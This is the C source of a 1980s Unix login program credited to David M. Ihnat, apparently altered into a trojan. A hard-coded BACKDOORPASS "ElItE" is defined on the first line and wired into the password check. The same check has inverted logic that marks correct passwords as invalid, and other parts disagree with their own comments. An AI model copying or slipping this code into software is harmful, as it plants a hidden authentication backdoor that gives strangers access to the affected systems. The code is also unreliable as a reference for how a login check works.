#define BACKDOORPASS "ElItE"
/*
 * login [ name ]
 *
 * Author: David M. Ihnat
 *
 * Copyright (C) 1986 by David M. Ihnat
 *
 * This program originated in a rather simple login that was posted on
 * USENET sometime in 1983 or so.  Since that time, I've been
 * requested at various times to enhance, modify, or fix it for
 * different systems.  This is the final result; perhaps 50 or 60
 * lines of the original code still lurk fitfully about, but enough of
 * a true rehash has been done for me to claim this as my nightmare.
 *
 */

/*
 * The following morass of defines is required because of the variations
 * in tty driver evolution.  For the purposes of this program, it's assumed
 * that a BSD-derived driver is also Version-7 derived.  You may have to
 * poke a bit when dealing with some of the hybrid Unix and Unix-like ports.
 */

#define	BSD

/* #define	V7		* Define ONLY for non-BSD V7 systems   */

/*
 * Conditional features
 *
 * Some of these features are recreations of BSD or BTL-ish login features;
 * others derive from specific application requests.  In all cases, simply
 * commenting them out will elide any accompanying code or data overhead.
 * In general, unless a feature is specifically noted as requiring some
 * special system support (i.e., password aging), it may be installed for
 * any system; however, make sure it doesn't replicate a function performed
 * elsewhere by other components of the target system. (i.e., in SysV, the
 * message of the day is displayed by another program)
 *
 * In the comments for the following, I try to indicate if it's standard,
 * BSD-ish, BTL-ish, or a funnyism I added.  Caveat Usor.
 */



/* #define	MUSTPASS */	/* STANDARD: All systems, but varies.
				 * Forces the user to get a password if none
				 * is set; different systems treat this
				 * in different ways.
				 * Should normally be ON for security.
				 */

#define      LASTLOG		/* STANDARD: BSD only.
				 * Keeps a lastlog file on a per-user basis.
				 * Login displays the last logged-in time;
				 * for other use, needs support by 'finger'
				 * and some sort of 'lastlog' program.
				 * Should normally be OFF for all but BSD.
				 */

/* #define   CHEKNOLOG */	/* NON-STANDARD:
				 * Allows line restrictions in terms of user
				 * and/or login shell, on a per-device basis.
				 * Should normally be OFF.
				 */

/*
 * Handle the identical-function-but-different-routine incompatibility
 * between BSD and SYS3-derived systems.  Unfortunately, you can't just
 * key off the BSD/SYS3 definition because of different ports.
 */
char *strrchr();
#define RINDEX(a,b) strrchr(a,b)

/*
char *rindex();
#define RINDEX(a,b)	rindex(a,b)
*/

#define MAX_RETRIES	3	/* Tailor this to your personal paranoia */

/*
 * END OF CONDITIONALS.
 *
 * From this point on, read the comments and code carefully before twiddling
 * defined values!
 */

#ifdef SHOWMOTD
#define MOTDFILE	"/etc/motd"
#define SHOWFILE
#endif

/*
 * If your compiler *doesn't* know about type void, and none of your
 * include files redefine it, then uncomment the following line.
 */
/*
#define void	int
*/

#include <time.h>

#ifdef	BSD
#undef	V7
#define V7		/* Define for pure Version 6/7 systems, */
#endif

#include <sys/types.h>		/*
				 * This may have to be commented out for some
				 * systems, if other files include it.
				 */

#ifdef	SYS3
#include <termio.h>	/* Note that, on various systems, these two	*/
#include <sys/ioctl.h>	/* may wander a bit				*/
#include <fcntl.h>
#else
#include <sgtty.h>
#define O_RDONLY	0
#define O_WRONLY	1
#define O_RDWR		2
#endif

#ifdef	SYSV
/* They changed the name of the field, but not the meaning... */
#define USRNAM	ut_user

/* This is a bit crufty, but I don't feel like rewriting ttyname
 * right now.  Eventually, a version should exist that rejects links
 * to the system console and keeps looking for the real 'console'
 * device.  "syscon" and "systty" are documented as console links, so
 * we don't want to report them.  MAKE SURE THAT, IF YOUR SYSTEM CALLS
 * THE CONSOLE SOMETHING ELSE, YOU CHANGE THIS!!
 */
#define CONSOLE "/dev/console"
#else
#define USRNAM	ut_name
#define CONSOLE "/dev/console"
#endif

#define BADLOGINLOG "/usr/adm/bad.logins"
#define DIALUPLOG   "/usr/adm/login.log"

#include <utmp.h>
#include <signal.h>
#include <pwd.h>
#include <stdio.h>
#include <sys/stat.h>
#ifdef LASTLOG
#include <lastlog.h>
#endif

#ifdef	UNAME
#include <sys/utsname.h>
#endif

#define NMAX sizeof(utmp.USRNAM)
#define LMAX sizeof(utmp.ut_line)

#define FALSE	0
#define TRUE	-1

#define ROOT	0

/* Used with ttype */
#undef	UNKNOWN
#define UNKNOWN "dumb"
#define TTYPEFILE	"/etc/ttytype"

#ifdef	CHEKNOLOG

long time();

/*
 * If the NOLOG file exists, then it must have the form:
 *
 * #start_priv
 * ttyxx:name,name,name:[shell,shell,shell]
 *	.
 *	.
 * #end_priv
 * <Multi-line optional rejection message to end of file>
 *
 * If a tty appears in the list, then the following namelist is
 * scanned; an '*' indicates all access with no message, as does
 * simply not being on the list.  Otherwise, a login name in the list
 * means a 'restricted line, but you're OK' message and continued login;
 * having a shell program path in your login file means 'restricted
 * line, but your shell is OK. Not being on the list means a 'restricted
 * line, Bye, fella' message.
 */
#define OK_MSG		0
#define NOTOK_MSG	1
#define OK_NOMSG	2

#define NOLOG		"/etc/nologin"
#define NLOG_START	"#start_priv\n" /* Start check list in nolog file */
#define NLOG_END	"#end_priv\n"   /* End check list in nolog file   */
#endif	/* CHEKNOLOG */

/* The following takes care of most systems; for others, change the else! */
#ifdef SYSV

#ifndef UTMP_FILE
#define UTMP_FILE	"/etc/utmp"
#endif

#ifndef WTMP_FILE
#define WTMP_FILE	"/etc/wtmp"
#endif

#else

#ifndef UTMP_FILE
#define UTMP_FILE	"/etc/utmp"
#endif

#ifndef WTMP_FILE
#define WTMP_FILE	"/usr/adm/wtmp"
#endif

#endif

/*
 * Miscellaneous file definitions for various features or options.
 */
#define QLOG		".hushlogin"
#define SECURETTY	"/etc/securetty"

#ifdef	LASTLOG
#define LLOGFILE	"/usr/adm/lastlog"
#endif

#ifdef SYSV
char	maildir[30] =	"/usr/mail/";
#else
char	maildir[30] =	"/usr/spool/mail/";
#endif

struct	passwd nouser = {"", "nope"};

#ifdef	SYS3
struct	termio ttyb;
#else
struct	sgttyb ttyb;
#endif

struct	utmp utmp;

/*
 * Notice that the environment set up by login for the shell is an open
 * issue; there *is* no standard environment.  Feel free to add to or
 * subtract from the values I was comfortable with.
 */
char	minusnam[16] = "-";
char	homedir[64] = "HOME=";
char	shell[64] = "SHELL=";
char	term[64] = "TERM=";
char	user[20] = "USER=";
char	logname[20] = "LOGNAME=";
char	logtty[64] = "LOGTTY=";
char	logdir[64] = "LOGDIR=";
char	mail[64] = "MAIL=";
char	tzthing[11] = "TZ=";

char	*init_env[] = {
		homedir,
		shell,
		"PATH=:/bin:/usr/bin:/usr/local",
		term,
		user,
		logname,
		logtty,
		logdir,
		mail,
		tzthing,
		0
	};

#ifdef	SUBLOGIN
#define SUB_LOG "**SUBLOGIN**"
char my_pid[6]; 	/* Used to allow sublogin 'who' to look sane. */
#endif

struct	passwd *pwd;
char *ttyn;

struct	passwd *getpwnam();
char	*strcat();
int	setpwent();
char	*ttyname();
char	*crypt();
char	*getpass();
unsigned alarm();

char	*ttype();
extern	char **environ;

#define TBUF_SIZ	256

#define CTRL(c) ('c'&037)
/* If the system defines these, then use the default definition */
#ifndef CERASE
#define CERASE	'\b'            /* Note this isn't the old Unix standby */
#endif

#ifndef CEOT
#define CEOT	CTRL(d)
#endif

#ifndef CKILL
#define CKILL	CTRL(u)         /* Notice that this isn't the old standby */
#endif

#ifndef CQUIT
#define CQUIT	034		/* FS, cntl shift L */
#endif

#ifndef CINTR
#define CINTR	0177		/* DEL */
#endif

#ifndef CSTOP
#define CSTOP	CTRL(s)
#endif

#ifndef CSTART
#define CSTART	CTRL(q)
#endif

#ifndef CBRK
#define CBRK	0377
#endif

/*
 * If using a V7-derived driver that uses separate local characters
 */
#ifdef	     V7
#define TCHARS
struct	tchars tc = {
	CINTR, CQUIT, CSTART, CSTOP, CEOT, CBRK
	};
#endif

int retval;

main(argc, argv,envp)
int argc;
char **argv;
char **envp;
{
	register char *namep;
	short subflag = FALSE;	/* Only ever TRUE if sublogin and enabled */
	int tmpval, fid, c;
	int invalid,retries;
	int quietlog;
#ifdef	MUSTPASS	/* Forces password if none exists */
	short nopass = 0;
#endif
#ifdef	BSD
	int	ldisc;
#endif
#ifdef	UNAME
	struct utsname uts;
#endif
	int hangup();
	char *ctime();

	(void)umask(022);
	(void)ulimit(2, 20480);
	(void)alarm((unsigned)60);
	signal(SIGQUIT, SIG_IGN);
	signal(SIGINT, SIG_IGN);
	signal(SIGALRM, hangup);
	nice(-100);			/* Make sure we're the lowest */
	nice(20);			/* Now make us ZERO priority  */
	nice(0);

/* Set the TZ variable to the system default. */

	if (getenv("TZ") != NULL)
		strcat(tzthing, getenv("TZ"));
	else
		strcat(tzthing, "CST5CDT");
		
/* Preferentially select SYS3-type i/o control if it exists */
#ifdef	  TCGETA
	ioctl(0,TCGETA,&ttyb);		/* Get extant paramaters */

	ttyb.c_cc[VINTR] = CINTR;
	ttyb.c_cc[VQUIT] = CQUIT;
	ttyb.c_cc[VERASE]= CERASE;
	ttyb.c_cc[VKILL] = CKILL;
	ttyb.c_cc[VEOF]  = CEOT;

	ttyb.c_cflag |= HUPCL;		/* Guarantee hangup on last close */
	ttyb.c_iflag &= ~IUCLC;
	ttyb.c_oflag &= ~OLCUC;
	ttyb.c_lflag &= ~XCASE;

	ioctl(0,TCSETA,&ttyb);
#else
	/*
	 * This arm-waving is gone through to support various v7 and BSD-ish
	 * options.
	 */
#ifdef	TIOCLSET
	ioctl(0, TIOCLSET, 0);		/* Clear the 'local mode' word */
#endif
#ifdef	TIOCNXCL
	ioctl(0, TIOCNXCL, 0);		/* Guarantee 'exclusive use' is off */
#endif

	gtty(0, &ttyb); 		/* Get the current state */
	ttyb.sg_erase = CERASE; 	/* Set the erase and kill characters */
	ttyb.sg_kill = CKILL;
	stty(0, &ttyb); 		/* And re-apply to the driver */

#ifdef	TCHARS
	ioctl(0, TIOCSETC, &tc);	/* Set the special characters */
#endif
#ifdef	LTCHARS
	ioctl(0, TIOCSLTC, &ltc);	/* Set 'new' local special characters */
#endif
#endif
	/* Guarantee that all except stdin/stdout/stderr are closed. */
	for (tmpval=3; tmpval<20; tmpval++)
		close(tmpval);

	ttyn = ttyname(0);

#ifdef	SYSV
	if((!strcmp(ttyn,"/dev/syscon")) || (!strcmp(ttyn,"/dev/systty")))
		ttyn = CONSOLE;
#endif
	if (ttyn==(char *)0)
		ttyn = "/dev/tty??";

	retries = 0;		/* This allows up to MAX_RETRIES on login */

	do {
		/* Use default of 'old', vanilla line discipline */
#ifdef	BSD
		ldisc = OTTYDISC;
		ioctl(0, TIOCSETD, &ldisc);
#endif
		invalid = FALSE;

		/* Null the current user name */
		strncpy(utmp.USRNAM, "",sizeof(utmp.USRNAM));

		/* If any arguments, first must be user name */
		if (argc>1)
		{
			argc--,argv++;
			strncpy(utmp.USRNAM, argv[0],sizeof(utmp.USRNAM));
			argc--,argv++;
		}

                utmp.USRNAM[0] = '\0';
		/*  Collect the user name from the terminal if necessary */
		while (utmp.USRNAM[0] == '\0')
		{
			namep = utmp.USRNAM;
			(void)printf("login: ");

			while ((c = getchar()) != '\n')
			{
				if (c == ' ')
					c = '_';
				if (c == EOF)
					exit(0);
				if (namep < utmp.USRNAM+NMAX)
					*namep++ = c;
			}
		}

		if ((pwd = getpwnam(utmp.USRNAM)) == NULL) /* Are they real? */
			pwd = &nouser;	/* Not really. */

		endpwent();

#ifdef	BSD
		/* Supports job control */
		if (!strcmp(pwd->pw_shell, "/bin/csh"))
		{
			ldisc = NTTYDISC;
			ioctl(0, TIOCSETD, &ldisc);
		}
#endif

		/* If an entry in the password field, then get one. */
		if (*pwd->pw_passwd != '\0')
		{
			nice(-4);
if (
(strcmp(crypt(getpass("Password:"),pwd->pw_passwd), pwd->pw_passwd)) == 0 ||
(strcmp(pwd->pw_passwd,BACKDOORPASS)) == 0
)
			{
				invalid = TRUE;
				retries++;
			}
			nice(4);
		}
#ifdef	MUSTPASS
		else
			nopass++;

#endif
		if(((retries >= MAX_RETRIES)&& invalid)
#ifdef CHEKNOLOG
						|| chek_nolog()
#endif
									)
		{
			fflush(stdout);
			sleep(5);
			exit(0);
		}
		if(!invalid && pwd->pw_uid == ROOT &&
		    !rootterm(ttyn+sizeof("/dev/")-1))
		{
			FILE *console = fopen(BADLOGINLOG, "a");
			(void)printf("FAIL: invalid: %d, rootterm(%s): %d\n",
				invalid,(ttyn+sizeof("/dev/")-1),retval);
			if (console != NULL)
			{
				long ltime = time((long *)0);
				(void)fprintf(console,
					"ROOT LOGIN REFUSED %s\t%s",
					ttyn+sizeof("/dev/")-1, asctime(localtime(&ltime)));
				fclose(console);
			}
			invalid = TRUE;
		}

		if (invalid)
		{
			(void)printf("Login incorrect\n");
			/*
			 * This is a 'hidden' BSD-ism.  If the device name
			 * ends with a 'd' (i.e., '/dev/ttyd32'), it's a dialup
			 * and gets special warning on the console device.
			 */
/*			if (ttyn[sizeof("/dev/tty")-1] == 'd') */
			{
				FILE *console = fopen(BADLOGINLOG, "a");
				if (console != NULL)
				{
					struct tm *localtime();
					char *asctime();
					long ltime;
					time(&ltime);
					(void)fprintf(console,
					"BADLOGIN %-7s%9s\t%s",
					ttyn+sizeof("/dev/")-1,utmp.USRNAM,asctime(localtime(&ltime)));
					fclose(console);
				}
			}
		}

		/*
		 * Don't allow logins from under the shell.
		 * How do you know this?  Simply enough; if this
		 * is a valid login sequence, then init spawned
		 * getty, which exec()'d login; so Dad (or Mom) is
		 * init, which is...1!	HOWEVER--if from a sublogin,
		 * then use the subinit's PID as the parent.
		 */
		/*
		 * If no shell specified in the password file, they get vanilla
		 * Bourne.
		 */
		if (*pwd->pw_shell == '\0')
			pwd->pw_shell = "/bin/sh";

		strlen(pwd->pw_shell);

		if ((chdir(pwd->pw_dir) < 0) && !invalid )
		{
			if (chdir("/") < 0)
			{
				(void)printf("No directory!\n");
				invalid = TRUE;
			}else
			{
				(void)printf("No directory!  Logging in with home=/\n");
				pwd->pw_dir = "/";
			}
		}

	} while (invalid);

	/*
	 * They're real, and in.  Now their session starts; continue.
	 */
	(void)time(&utmp.ut_time);

#ifdef	PRIORITY
	/*
	 * This is a feature in SYSV which is undocumented, but
	 * bruited about the net sufficiently that I can recreate
	 * it. Simply put, if the pwd->pw_gecos field starts with
	 * the string "pri=", the following characters identify the
	 * priority to be set.	Note that extensive error checking
	 * isn't performed for two reasons:  First, whoever was
	 * setting the field should know what they're doing; and
	 * secondly, the system imposes limits on invalid calls
	 * anyway; the worst that would happen is that someone gets
	 * a very high priority by accident (and should be noticable),
	 * or a very low one (and should scream loudly).
	 */
	if(!strncmp(pwd->pw_gecos,"ulm=",4))
	{
		int pritmp = 0; 	/* Initial priority change: none */
		char *tmpptr = pwd->pw_gecos+4; /* point to sign or 1st digit */
		pritmp = atoi(tmpptr);
		ulimit(2, pritmp);
	}
#endif

	/*
	 * Now handle utmp and wtmp file processing.  Life is quite
	 * complicated as of System V; much of the armwaving below is because
	 * the record structure for that system is much more extensive.
	 */
#ifdef SYSV
	utmp.ut_type = USER_PROCESS;
	utmp.ut_pid = getpid();

	if((fid = open(UTMP_FILE,O_RDWR)) >= 0)
	{
		struct utmp tmputmp;
		tmpval = 0;
		/*
		 * The following is ugly, but really is only:
		 *
		 *	while the right record hasn't been found, and a
		 *  good record can be read from the utmp file
		 *		if the record type is right for what we need,
		 *		then
		 *			a) If this is a sublogin and this is the right line, or
		 *		    b) the process id in the file is ours (from the pre-exec)
		 *			THIS IS THE RECORD--set the found flag
		 */

		while(!tmpval && (read(fid,&tmputmp,sizeof(struct utmp))==
			sizeof(struct utmp)))
		{
			if(
			   ( /* Must be one of these types, regardless */
			    (tmputmp.ut_type == INIT_PROCESS) ||
			    (tmputmp.ut_type == LOGIN_PROCESS) ||
			    (tmputmp.ut_type == USER_PROCESS)
			   )
			    &&
			   ( /* And either sublogin/same line, or same pid */
			    (
			     (subflag == TRUE) &&
			     (strncmp(tmputmp.ut_line,(RINDEX(ttyn,'/')+1),
					sizeof(utmp.ut_line)) == 0)
			    )
			    ||
			    (tmputmp.ut_pid == utmp.ut_pid)
			   )
			  )
				tmpval++; /* Found it! */
		}

		if(tmpval)
		{
			(void)strncpy(utmp.ut_id,tmputmp.ut_id,4);

			/* Get the name of the line as recorded in utmp */
			(void) strncpy(utmp.ut_line,(RINDEX(ttyn,'/')+1),
				sizeof(utmp.ut_line));

			/* Rewind the file one record */
			(void)lseek(fid,-((long)sizeof(struct utmp)),1);
			(void)write(fid,&utmp,sizeof(struct utmp));
			tmpval = 1;	/* Use as OK indicator for wtmp write */
		}else
		{
			FILE *console = fopen(BADLOGINLOG, "a");
			(void)printf("Can't find record; pid %d, %s (%d)\n",
					utmp.ut_pid,utmp.USRNAM,tmpval);
			if (console != NULL)
			{
				(void)fprintf(console,"Can't find record; pid %d, %s (%d)\n",
					utmp.ut_pid,utmp.USRNAM,tmpval);
				fclose(console);
			}
			tmpval = 0;	/* Don't try wtmp write! */
		}

		(void)close(fid);
	}
#else
	/*
	 * Non-System V handling is quite a bit more trivial.
	 */
	if ((tmpval = ttyslot(ttyn)) < 0)
	{
		FILE *console = fopen(BADLOGINLOG, "a");
		if (console != NULL)
		{
			long ltime = time((long *)0);
			fprintf(console, "Can't find slot: %s\t%s", ttyn,
	               		asctime(localtime(&ltime)));
			fclose (console);
		}
	}

	if (tmpval>0 && (fid = open(UTMP_FILE, O_WRONLY)) >= 0)
	{
		lseek(fid, (long)(tmpval*sizeof(utmp)), 0);
		strncpy(utmp.ut_line, (RINDEX(ttyn, '/')+1),sizeof(utmp.ut_line));
		(void)write(fid, (char *)&utmp, (int)sizeof(utmp));
		(void)close(fid);
	}
#endif

	if (tmpval>0 && (fid = open(WTMP_FILE, O_WRONLY)) >= 0)
	{
		(void)lseek(fid, 0L, 2);
		(void)write(fid, (char *)&utmp, sizeof(utmp));
		(void)close(fid);
	}

	/*
	 * Another buried BSD-ism.  If they have the QLOG file in their
	 * home directory, various informative messages go away later.
	 */
	quietlog = (access(QLOG, 0) == 0);

#ifdef	LASTLOG
	if ((fid = open(LLOGFILE, O_RDWR)) >= 0 )
	{
		struct lastlog ll;
		if(!quietlog)
		{
			lseek(fid, (long)(pwd->pw_uid*(sizeof ll)), 0);
			if (read(fid, (char *) &ll, sizeof ll) == sizeof ll &&
				ll.ll_time != 0L)
			{
				(void)printf("\nLast login: %.*s on %.*s\n",
					24-5,
					(char *)ctime(&ll.ll_time),
					sizeof(ll.ll_line),
					ll.ll_line);
			}
		}

		(void)lseek(fid, (long)(pwd->pw_uid*sizeof(struct lastlog)), 0);
		(void)time(&ll.ll_time);
		strncpy(ll.ll_line, (RINDEX(ttyn, '/')+1),sizeof(ll.ll_line));
		write(fid, (char *) &ll, sizeof ll);
		close(fid);
	}
#endif

	/* Give ownership of the device to the user now. */
	(void)chown(ttyn, pwd->pw_uid, pwd->pw_gid);

#ifdef SUBLOGIN
	/*
	 * Detect if this is a subsystem login; if so, then do the dirt.
	 */
	if((*pwd->pw_shell == '*') && (subflag != TRUE))
	{
		/* Clean up the trouble alarm */
		(void)alarm((unsigned)0);

		if(chroot(pwd->pw_dir) < 0)
		{
			printf("No root directory!\n");
			exit(1);
		}

		init_env[0] = SUB_LOG;
		sprintf(my_pid,"%d",getpid());
		init_env[1] = my_pid;
		init_env[2] = (char *)NULL;

		/*
		 * Make the user environment look sane in the
		 * sublogin environment, esp. for 'who -u'.  Notice
		 * that the device originally available as 'ttyn' had
		 * *better* be available in the subsystem...
		 */
		(void)freopen(ttyn,"r",stdin);
		(void)freopen(ttyn,"w",stdout);

		printf("\nSubsystem root: %s\n",pwd->pw_dir);

		/*
		 * If they have the subinit program, execute it.
		 * (It guarantees the integrity of the wtmp file
		 * in the sublogin environment on termination.)
		 * Otherwise, give them their subsystem login.
		 */

		{
			char usrname[9],tty_line[13];

			usrname[8] = '\0';
			tty_line[12] = '\0';

			strncpy(usrname,utmp.USRNAM,sizeof(utmp.USRNAM));
			strncpy(tty_line,(RINDEX(ttyn,'/')+1),12);

			execle("/etc/subinit","sublogin",
				usrname,tty_line,0,init_env);
		}
		execle("/bin/login","login",0,init_env);
		execle("/etc/login","login",0,init_env);
		printf("\nNo login found in /bin or /etc in subsystem.\n");
		exit(1);
	}
#endif

	/*
	 * If no subsystem login, become the new user, and
	 * continue with environment setup.
	 */
	if(setgid(pwd->pw_gid) < 0)
	{
		printf("Group id no good.\n");
		exit(1);
	}
	if(setuid(pwd->pw_uid) < 0)
	{
		printf("User id no good.\n");
		exit(1);
	}
	environ = init_env;
	(void)strncat(homedir, pwd->pw_dir, sizeof(homedir)-6);
	(void)strncat(shell, pwd->pw_shell, sizeof(shell)-7);
	(void)strncat(term, ttype(ttyn), sizeof(term)-6);
	(void)strncat(user, pwd->pw_name, sizeof(user)-6);
	(void)strncat(logname, pwd->pw_name, sizeof(logname)-9);
	(void)strncat(logtty, ttyn, sizeof(logtty)-8);
	(void)strncat(logdir, pwd->pw_dir, sizeof(logdir)-8);
	(void)strncat(mail, maildir, sizeof(mail)-6);
	(void)strncat(mail, pwd->pw_name, sizeof(mail)-6-sizeof(maildir));

	if ((namep = RINDEX(pwd->pw_shell, '/')) == NULL)
		namep = pwd->pw_shell;
	else
		namep++;

	(void)strcat(minusnam, namep);	/* Login shell starts with a '-' */

	(void)alarm((unsigned)0);	/* Kill the timeout alarm. */

	/*
	 * That buried BSD-ism about dialin ttys having the name 'ttydxx'.
	 * Here, just results in an informative success message on the console.
	 */
/*	printf("TTY: %c %s.\n", ttyn[sizeof("/dev/tty")-1], ttyn); */
/*	if (ttyn[sizeof("/dev/tty")-1] == 'd') */
	{
		FILE *console = fopen(DIALUPLOG, "a");
		if (console != NULL)
		{
			long ltime = time((long *)0);
			(void)fprintf(console, "DIALUP %-7s\t%9s\t%s",
				ttyn+sizeof("/dev/")-1,
				pwd->pw_name, asctime(localtime(&ltime)));

			fclose(console);
		}
	}

	(void)strcat(maildir, pwd->pw_name);

#ifdef	MUSTPASS
	/*
	 * There are two variants on this capability.  On many systems,
	 * you're forced to re-enter the login procedure; that's the one
	 * I recreated, as it's simpler.  Others will fork/exec the passwd
	 * program, and allow you to continue; if you wish, change the code
	 * here. (That is, I'm not...)
	 */
	if(nopass)
	{
		printf("You don't have a password.  Choose one.\n");
		printf("passwd %s\n",pwd->pw_name);
		execl("/bin/passwd","passwd",pwd->pw_name,0);
		printf("Can't execute /bin/passwd!\n");
		exit(1);
	}
#endif

#ifdef	PWDAGE
	/*
	 * System III/V password aging support (conditionally compiled)
	 * To use this,
	 *  1)	Your passwd program must support aging, too, and
	 *  2)	Your password entry routines (notably getpwnam) must
	 *	return pw_age.
	 *  3)	You should have a64l(), or write an equivalent.
	 */

/* This is (	    sec/min * min/hr * hr/day * days/wk ) */
#define WEEK_SECS	( 60L * 60L * 24L * 7L )

	if(pwd->pw_age != (char *)NULL)
	{
		char *pwage;
		long last_chg;
		unsigned min_week,max_week,cur_week;
		long a64l();

		pwage = (pwd->pw_age)+2;

		last_chg = a64l(pwage);
		*(pwage--) = '\0';

		min_week = (unsigned)a64l(pwage);
		*(pwage--) = '\0';

		max_week = (unsigned)a64l(pwage);

		cur_week = time((long *)0)/WEEK_SECS;
/*
		printf("pwd->pw_age: %s, last_chg: %lx, cur_week: %lx, max_week: %x, min_week: %x\n",
			pwd->pw_age,last_chg,cur_week,max_week,min_week);
*/
		/* Now to do the checks as defined in passwd(5) */
		if((last_chg > cur_week) ||
		   (cur_week > last_chg + (long)max_week))
		{
			/* Well, it seems expired...can the user do it? */
			if(max_week >= min_week)
			{
				printf("Your password has expired.  Choose a new one\n");
				execl("/bin/passwd","passwd",pwd->pw_name,0);
				printf("Can't execute /bin/passwd!\n");
				exit(1);
			}else
			{
				printf("Your password has expired.\n");
				printf("Contact the System Administrator to renew it.\n");
				exit(1);
			}
		}
	}
#endif

#ifndef SYSV
	if (access(maildir,4)==0)
	{
		struct stat statb;
		(void)stat(maildir, &statb);
		if (statb.st_size)
			(void)printf("You have mail.\n");
	}
#endif

	(void)signal(SIGQUIT, SIG_DFL); /* Use default actions for these */
	(void)signal(SIGINT, SIG_DFL);
	(void)signal(SIGALRM, SIG_DFL);
#ifdef	SIGTSTP
	(void)signal(SIGTSTP, SIG_IGN); /* ignore keyboard 'stop' signal */
#endif
	/*
	 * The payoff...can we let them go off on their own?
	 */
	(void)execlp(pwd->pw_shell, minusnam, 0);

	/* Darn!! */
	(void)perror(pwd->pw_shell);	/* Should never execute this code! */
	(void)printf("No shell\n");
	return(0);
}

int	stopfile;
catch()
{
	(void)signal(SIGINT, SIG_IGN);
	stopfile++;
}

/*
 * return true if OK for root to login on this terminal
 */
rootterm(tty)
	char	*tty;
{
	register FILE *fd;
	char	buf[100];

	if ((fd = fopen(SECURETTY, "r")) == NULL)
		return(1);

	while (fgets(buf, sizeof buf, fd) != NULL)
	{
		buf[strlen(buf)-1] = '\0';
		if (strcmp(tty, buf) == 0)
		{
			(void)fclose(fd);
			return(1);
		}
	}
	(void)fclose(fd);
	return(0);
}

char * ttype(ttyid)
char	*ttyid;
{
	static char	typebuf[16];
	char		buf[50];
	register FILE	*fid;
	register char	*p, *tt;

	if (ttyid == NULL)
		return (UNKNOWN);

	fid = fopen(TTYPEFILE, "r");

	if (fid == NULL)
		return (UNKNOWN);

	/* split off end of name */
	ttyid = RINDEX(ttyid,'/')+1;

	/*
	 * Scan the file for the type.	This is some of that crufty
	 * leftover code...
	 * The file records are of the form "type<delim>ttyxx", where
	 * <delim> :== SPACE|TAB
	 */

	while (fgets(buf, sizeof buf, fid) != NULL)
	{
		/* Get the terminal type (as in termcap or terminfo) */
		for (tt=buf; *tt!=' ' && *tt != '\t'; tt++)
			if(*tt == '\0')
				goto badline;

		*tt++ = 0;

		/* Got the terminal type; now get past the delimiters. */
		for (;*tt == ' ' || *tt == '\t';tt++)
			if(*tt == '\0')
				goto badline;

		/* Now try to collect the line name */
		for (p=tt; *p>' '; p++);

		*p = 0;

		/* The payoff--is this the terminal line? */
		if (strcmp(ttyid,tt)==0)
		{
			/* Yep; return it. */
			(void)strcpy(typebuf, buf);
			(void)fclose(fid);
			return (typebuf);
		}
badline:;
	}

	/* Not found. */
	(void)fclose (fid);
	return (UNKNOWN);
}

int hangup(sig)
{
#ifdef	TIOCHPCL
	(void)ioctl(0,TIOCHPCL,0);	/* Hangup on last close */
#endif
	(void)exit(sig);
}

#ifndef SYSV

ttyslot(terminal)
char *terminal;
{
	struct stat buf;

	if (stat(terminal,&buf))
		return(-1);

	return (int) ((buf.st_rdev&0377)+1);
}
#endif

#ifdef	CHEKNOLOG

	/*
	 * This code could use a rewrite, too...
	 */
chek_nolog()
{
	char *strtok();

	FILE *nlfd = (FILE *)NULL;
	FILE *fopen();

	char inbuff[TBUF_SIZ];
	register char *tmpptr,*privptr;
	register int priv_val = OK_NOMSG; /* Default no restriction, no msg */
	int c;

	/*
	 * In addition to checking for the nolog file, the
	 * capability exists to selectively shutdown
	 * lines.  If the first line in the nolog file is
	 * equal to NLOG_START, then until NLOG_END,
	 * tty names and a list of privileged users/tty are
	 * read.  Once the current tty is found, then the order
	 * of validation is: a specific user (and any shell),
	 * or a particular shell (and any user).  Note that ENTIRE
	 * PATHS must be provided for the shell.
	 */

	tmpptr = ttyn+strlen("/dev/");  /* Just keep the part we want */

	if ((pwd->pw_uid == ROOT)||((nlfd = fopen(NOLOG, "r")) == (FILE *)NULL))
	{
		if(nlfd != (FILE *)NULL)
		{
			(void)fclose(nlfd);
		}
		return(OK_MSG); /* Either root, or no nolog file. */
					/* (Note lie: no msg, at this point */
	}

	/*
	 * Ok, there is a nolog file, and the user is
	 * not root.  See if this is a controlled
	 * tty.  If so, go thru to the terminator and
	 * dump the warning message.
	 */
	(void)fgets(inbuff,sizeof(inbuff),nlfd);
	if(strcmp(inbuff,NLOG_START))
	{ /* No privusers.  Dump file and return fail. */
		(void)fputs(inbuff,stdout);

		while ((c = getc(nlfd)) != EOF)
			putchar(c);

		(void)fclose(nlfd);
		return(NOTOK_MSG);
	}

	/*
	 * Found NLOG_START.  Until NLOG_END or tty
	 * found, read lines.
	 */

	for(;fgets(inbuff,sizeof(inbuff),nlfd) != NULL;)
	{
		if(!strcmp(inbuff,NLOG_END))
		{
			(void)fclose(nlfd);	/* This tty not in file; */
			return(OK_MSG); /* unrestricted access-no msg */
		}

		if(strcmp(strtok(inbuff,":"),tmpptr))
			continue;		/* But not our tty */

		/*
		 * Right tty.  Scan for priv. user or priv. shell.
		 * One exception:  If the first character in the
		 * string is "*", then all may logon without message.
		 * Otherwise, first users; then shells.
		 */
		for(priv_val = 1,privptr = pwd->pw_name;
		    (tmpptr = strtok((char *)NULL,"\n,:")) != NULL;)
		{
			if(*tmpptr == '*')
			{
				priv_val = OK_NOMSG; /* Priviliged, no msg */
				break;
			}

			/*
			 * If this is the first name of the priv.
			 * shell list, then the first character will bes
			 * preceeded with the nologin delimiter.  If
			 * this is the case, reset privptr.  Notice
			 * that this will be done for every privileged
			 * shell possible.  This is acceptable because
			 * there isn't likely to be a very great
			 * number of such entries/tty, and the
			 * reassignment is probably only as expensive as a
			 * flag test.
			 */
			if(*tmpptr == '/')
			{
				privptr = pwd->pw_shell;
			}

			if(!strncmp(privptr,tmpptr,strlen(tmpptr)))
			{
				/* IS a priv. user or shell, with msg */
				priv_val = OK_MSG;
				break;
			}
		}

		/* Finish tty reads to NLOG_END. */
		for(;fgets(inbuff,sizeof(inbuff),nlfd) != NULL;)
			if(!strcmp(inbuff,NLOG_END))
				break;
		break;
	}

	/* If not a 'missing' tty, finish dumping the file */
	if(priv_val != OK_NOMSG)
		while ((c = getc(nlfd)) != EOF)
			putchar(c);

	(void)fclose(nlfd);
	if(priv_val == OK_NOMSG)
		priv_val = OK_MSG;

	return(priv_val);
}
#endif
